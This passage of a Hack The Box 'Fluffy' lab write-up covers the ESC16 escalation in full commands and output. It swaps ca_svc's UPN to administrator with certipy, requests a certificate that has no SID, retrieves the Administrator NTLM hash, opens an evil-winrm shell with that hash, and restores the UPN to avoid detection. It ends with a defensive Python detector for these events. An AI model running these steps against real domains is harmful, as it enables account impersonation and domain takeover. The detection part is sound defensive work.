└─# certipy-ad find -username ca_svc -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'fluffy-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'fluffy-DC01-CA' via CSRA: Could not connect: timed out
[*] Trying to get CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'fluffy-DC01-CA'
[*] Saved BloodHound data to '20250727150414_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250727150414_Certipy.txt'
[*] Saved JSON output to '20250727150414_Certipy.json'
```
CA name: fluffy-DC01-CA

The saved zip can be imported into BloodHound to view the attack path.
As the ca_svc user, using its hash, request a certificate from fluffy-DC01-CA based on the User template. Because the CA is ESC16-vulnerable, it issues the certificate without the SID security extension (the `Certificate has no object SID` line below confirms this), so the domain controller maps the certificate to an account by UPN alone; with ca_svc's UPN temporarily set to administrator, this yields a certificate and private key that impersonate the Administrator user.

Then use the administrator.pfx just obtained to authenticate to the fluffy.htb domain as administrator and retrieve the hash.
```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# export KRB5CCNAME=ca_svc.ccache
```
Set the KRB5CCNAME environment variable to point at the ca_svc user's Kerberos credential cache.

```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_svc'
```
Using ca_svc's hash, change the userPrincipalName (UPN) attribute of the ca_svc account to administrator.

```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# ntpdate 10.10.11.69
2025-07-28 08:48:45.139284 (-0400) +47.012763 +/- 0.096627 10.10.11.69 s1 no-leap
CLOCK: time stepped by 47.012763
```
Sync the Kali machine's clock with the domain controller again.

```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# certipy-ad req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 24
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```
As the ca_svc user, using its hash, request a certificate based on the User template from fluffy-DC01-CA.

```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
```
With the certificate obtained, restore the ca_svc account's userPrincipalName (UPN) to its original value ca_svc@fluffy.htb so that no suspicious UPN change is left behind in Active Directory.

```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip 10.10.11.69
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
```
Use the administrator.pfx certificate just obtained to authenticate to the fluffy.htb domain as administrator; this returns the Administrator user's NTLM hash.

```
┌──(root㉿kali)-[/myift/…/htb/8/2fluffy/CVE-2025-24071-main]
└─# evil-winrm -i 10.10.11.69 -u administrator -H '8da83a3fa618b6e3a00e93f676c92a6e'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
fbb4e8*************************
*Evil-WinRM* PS C:\Users\Administrator\desktop>
```
Root flag obtained.
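Both escalation steps in this writeup leave a distinctive trail in directory and CA audit logs: the Shadow Credentials step writes msDS-KeyCredentialLink on winrm_svc and ca_svc from a different principal (p.agila), and the ESC16 step changes ca_svc's UPN to another account's name, gets a certificate issued for that UPN with no SID extension, then changes the UPN back. The detector below is an added example, not part of the original writeup or of any of the tools it uses. It runs over constructed, simplified event records that stand in for Windows Security events 5136 (directory service object modified), 4738 (user account changed) and 4887 (Certificate Services issued a certificate); the field names inside `data`, the timestamps and the benign control events are this example's own assumptions, not the exact fields Windows logs.

```python
"""Detect Shadow Credentials writes and ESC16-style UPN swaps in AD audit events.

Added example, not part of the original writeup. Event shapes are simplified
stand-ins for Windows Security events 5136, 4738 and 4887 (assumption).
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta


@dataclass
class Event:
    time: datetime
    event_id: int
    subject: str                # principal that performed the action
    target: str                 # account the action was performed on
    data: dict = field(default_factory=dict)


def _local_part(upn: str) -> str:
    return upn.split("@", 1)[0].lower()


def find_shadow_credential_writes(events, allowed_writers=()):
    """msDS-KeyCredentialLink changed on an account by someone other than that
    account. `allowed_writers` lists service principals that legitimately manage
    the attribute for other accounts (e.g. a device-registration service)."""
    allowed = {w.lower() for w in allowed_writers}
    return [
        e for e in events
        if e.event_id == 5136
        and e.data.get("attribute", "").lower() == "msds-keycredentiallink"
        and e.subject.lower() != e.target.lower()
        and e.subject.lower() not in allowed
    ]


def find_upn_hijacks(events, known_accounts, window=timedelta(minutes=30)):
    """A UPN change that collides with another existing account's name, correlated
    with a certificate issued for that UPN by the same requester inside `window`,
    and with a later change of the UPN back to the account's own name."""
    known = {a.lower() for a in known_accounts}
    findings = []
    for e in events:
        if e.event_id != 4738 or e.data.get("attribute") != "userPrincipalName":
            continue
        spoofed = _local_part(e.data["new"])
        if spoofed == e.target.lower() or spoofed not in known:
            continue        # set to its own name (a restore), or to no existing account
        certs = [
            c for c in events
            if c.event_id == 4887
            and c.subject.lower() == e.subject.lower()
            and _local_part(c.data.get("upn", "")) == spoofed
            and timedelta(0) <= c.time - e.time <= window
        ]
        restored = any(
            r.event_id == 4738
            and r.target.lower() == e.target.lower()
            and r.data.get("attribute") == "userPrincipalName"
            and r.time > e.time
            and _local_part(r.data["new"]) == e.target.lower()
            for r in events
        )
        findings.append({
            "account": e.target,
            "spoofed_upn": e.data["new"],
            "certs_issued": len(certs),
            # ESC16 indicator: issued certificate carries no SID security extension
            "no_sid_extension": any(not c.data.get("sid_extension", True) for c in certs),
            "upn_restored": restored,
        })
    return findings


# Constructed sample timeline mirroring the writeup (timestamps invented).
T0 = datetime(2025, 7, 27, 18, 9)
EVENTS = [
    Event(T0, 5136, "p.agila", "winrm_svc", {"attribute": "msDS-KeyCredentialLink", "op": "add"}),
    Event(T0 + timedelta(seconds=3), 5136, "p.agila", "winrm_svc", {"attribute": "msDS-KeyCredentialLink", "op": "delete"}),
    Event(T0 + timedelta(hours=2), 4738, "ca_svc", "ca_svc", {"attribute": "userPrincipalName", "new": "administrator"}),
    Event(T0 + timedelta(hours=2, minutes=1), 4887, "ca_svc", "ca_svc", {"template": "User", "upn": "administrator", "sid_extension": False}),
    Event(T0 + timedelta(hours=2, minutes=2), 4738, "ca_svc", "ca_svc", {"attribute": "userPrincipalName", "new": "ca_svc@fluffy.htb"}),
    # Benign controls: a user enrolling its own key, and an ordinary certificate with the SID extension.
    Event(T0 + timedelta(hours=3), 5136, "j.fleischman", "j.fleischman", {"attribute": "msDS-KeyCredentialLink", "op": "add"}),
    Event(T0 + timedelta(hours=3, minutes=1), 4887, "j.fleischman", "j.fleischman", {"template": "User", "upn": "j.fleischman@fluffy.htb", "sid_extension": True}),
]
KNOWN_ACCOUNTS = ["administrator", "ca_svc", "winrm_svc", "p.agila", "j.fleischman"]

if __name__ == "__main__":
    for e in find_shadow_credential_writes(EVENTS):
        print(f"[shadow-creds] {e.subject} wrote msDS-KeyCredentialLink on {e.target} at {e.time}")
    for f in find_upn_hijacks(EVENTS, KNOWN_ACCOUNTS):
        print(f"[upn-swap] {f}")
```

Event 5136 only fires when a SACL audits writes to the attribute, so the first rule assumes object-access auditing is configured on the accounts of interest. The `no_sid_extension` flag is the direct counterpart of the `Certificate has no object SID` line in the certipy output: a CA that issues without the SID extension is what makes the UPN swap sufficient for impersonation.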